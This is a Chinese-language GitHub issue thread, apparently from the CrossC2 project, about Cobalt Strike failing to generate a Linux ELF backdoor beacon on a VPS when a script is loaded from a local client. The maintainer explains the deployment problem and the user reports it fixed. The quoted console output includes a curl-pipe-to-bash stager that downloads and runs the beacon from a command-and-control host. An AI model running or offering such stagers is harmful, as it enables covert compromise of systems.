### ISSUE TITLE
本地load cna无法在vps生成elf后门

### ISSUE THREAD

**Issue by Natz-ft** [gloxec/CrossC2#33]
师傅你好，我cs放在公网vps，从cs客户端本地load cna，改的cna中generator路径为本地windows exe的generator路径，在用cna生成payload的时候发现二阶payload内容为空，之后发现是因为elf后门没有生成在vps，更改output路径后可以在本地生成(但好像没什么用)，请问师傅我这操作是哪里有问题，我查了vps本地load cna，没找到能解决问题，还请师傅有空指导一下，感谢！
以下为cs控制台输出，genCrossC2 beacon位置为空
09/02 18:21:43 *** E:\Tool\CrossC2\genCrossC2.Win.exe vpsip 8080 E:\Tool\CrossC2\.cobaltstrike.beacon_keys null Linux x64 /tmp/CrossC2-test
09/02 18:21:44 *** genCrossC2 beacon -> 
09/02 18:21:44 *** admin hosted CrossC2 beacon Linux x64 @ http://vpsip:55413/ryVblkjFMr
09/02 18:21:44 *** CrossC2 Linux x64:   curl -A o -o- -L http://vpsip:55413/a | bash -s

**Comment by gloxec** [comment]
> 09/02 18:21:44 *** genCrossC2 beacon ->

上面这行正常是会包含生成beacon大小字节数，但你这里返回为空，怀疑未正确生成，建议按照提示生成的命令行手动测试

> 09/02 18:21:43 *** E:\Tool\CrossC2\genCrossC2.Win.exe vpsip 8080 E:\Tool\CrossC2.cobaltstrike.beacon_keys null Linux x64 /tmp/CrossC2-test

**Comment by Natz-ft** [comment]
在windows本地是可以生成的，但怎么在vps生成，"curl -A o -o- -L http://vpsip:55413/a | bash -s"，不然这个curl的目的实现不了a

**Comment by gloxec** [comment]
在本地可以成功生成的话，它会上传部署到teamserver上，部署失败的话看看是不是URI还有port之类的有冲突或者其他错误

**Comment by Natz-ft** [comment]
感谢师傅，跟师傅说的一样，问题解决了
